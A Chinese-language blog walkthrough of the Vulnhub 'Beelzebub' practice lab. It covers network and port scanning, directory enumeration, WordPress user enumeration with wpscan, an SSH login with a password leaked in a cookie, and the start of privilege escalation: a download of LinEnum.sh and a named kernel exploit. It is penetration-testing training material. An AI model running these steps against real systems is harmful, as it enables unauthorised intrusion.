Vulbhub Beelzebub Walkthrough
前言
上午搞了一个靶场,今天是20220514,天气依然很晴朗,此时的我有一丝丝的悠闲,刚刚帮我的好朋友熊大刷完了网课(罪过呀,又让她逃过了看网课的痛苦)。啊!此时我真想吟诗一首,来让自己不那么的无聊,想来想去还是找个靶场练习下技术吧,闲着也是闲着。
怒发冲冠,凭栏处、潇潇雨歇。
抬望眼,仰天长啸,壮怀激烈。
三十功名尘与土,八千里路云和月。
莫等闲,白了少年头,空悲切!
靖康耻,犹未雪。
臣子恨,何时灭!
驾长车,踏破贺兰山缺。
壮志饥餐胡虏肉,笑谈渴饮匈奴血。
待从头、收拾旧山河,朝天阙。
在这篇通关教程之中,我们将解决一个 Vulnhub
平台上的名叫 Beezebub
的靶场,难度等级 easy
。
教程还是分为以下的几部分:
- 实用工具收集目标主机的
IP
和端口
信息 - 暴力枚举
HTTP
服务的敏感信息 - 登陆
ssh
- 提权
信息收集
IP
信息
多余的废话不多说,直接上工具扫描。使用 netdiscover
对网段进行扫描。排除掉我们的自己的机器之后,剩下的就是目标主机的 ip
了。
netdoscover
可以看到,目标主机的 IP:192.168.17.159
,下一步使用我们的端口扫描工具 nmap
对其探测。
端口信息
还是上篇文章说的,之所以先扫描再使用浏览器登陆查看。因为有的 http
服务更改了默认的端口(极少数),所以我先扫描再查看。
nmap -A -T4 192.168.17.159 -p-
嗯,现在就放心了,只开放了这俩端口,既然这样,我就打开浏览器看看这是什么东西。
枚举 HTTP
因为这次的 HTTP
端口只有一个,所以就直接进行枚举就可以了。不过在此之前,我先去网页端看看有什么有价值的信息没有,一个好的习惯就是记得经常性的查看一下源代码,可能会有意想不到的收获。
依然是一个熟悉的 apache
的默认页面,单单从网页上来说,没有任何的价值。但是查看一下源代码,还是没有什么收获。
话不多说了,直接上工具吧,一个个的试探在自动化的工具勉强有点略显苍白。
发现一个 index.php
和 phpmyadmin
的目录入口,感觉一下子机会来了。所以先去看看再说,还是再说一句,随时随地的查看源代码真的是一个非常好的习惯。有些不经意之间的小信息极可能就被抓住了。
洋鬼子话,翻译过来就大体上是这么个意思“我的某个东西被加密了,就是把 beelzebub
用 md5
加密了”,这里的加密之后的子串可能是一个用户的密码,也可能是某个目录的入口,总之挨着试一遍吧,总不能说是所有的东西都是一帆风顺的走下来,那不现实、更不可能。
echo -n beelzebub | md5sum
d18e1e22becbd915b45e0e655429d487
扫描出来的还有一个 phpmyadmin
的界面,所以这里不是搞出来一个beelzebub:d18e1e22becbd915b45e0e655429d487
嘛,去试试,不行再说,不行还有别的办法。
果然还是不行,这一步路走没了。鲁迅说过:世上本没有路,走的人多了,也变成路。
那么这个 md5
值,就是可能就是一个目录的入口了。首先在浏览器访问一下,发现是不行的。那么可能是有子目录,还是直接扫描一下,这次我们换一个工具。老是用一个工具有那么一丝丝的审美疲劳了。这次用 dirsearch
,同样是一个非常强大的工具。
看上去这都是一些敏感的目录啊,真的多,不行了,我先去挨个试试了。看到这里其实我们就已经发现了,这个网站的cms是 WordPress
啊。等会我看完这几个目录,用专用的工具探测一下,可能会有意料之外的收获。
只有个 uploads
目录可以访问
点击去狂选的目录发现是一个服务,我意外的发现这个地方其实存在 XSS
注入,我还用 beef
连上了呢,不过与本题无关,有些跑偏了。
随便打点东西,发现在cookie那一栏出现了明文的密码,这可真是意外之喜啊!但是密码有了,用户名又是什么?前面说了要用一个专用的扫描 wordpress
的工具扫描一下,说干咱就干,这就来!
wpscan --url http://192.168.17.159/d18e1e22becbd915b45e0e655429d487/ -e u --ignore-main-redirect --force
你看,这还真就爆出来俩用户,试试使用那个 cookie
里面的密码能不能登录,但是登陆什么呢?目前有两个想法,一是登陆那个 phpmyadmin
,二是登陆 SSH
。挨着试试,首先尝试一下前者。发现不行,那么再来两次 SSH
尝试,看看到底哪一个用户可以使用这个密码登陆。发现第一个用户可以登陆。遂登陆之。
提权
登录上来之后,首先看了一下基本的信息。如下图所示。
使用脚本收集敏感信息
直接上神器
curl -O https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
直接运行即可。会出来一大堆信息,查看是否有你需要的,我这里就不用了,因为我已经发现了这个版本的内核是存在提权漏洞的。47009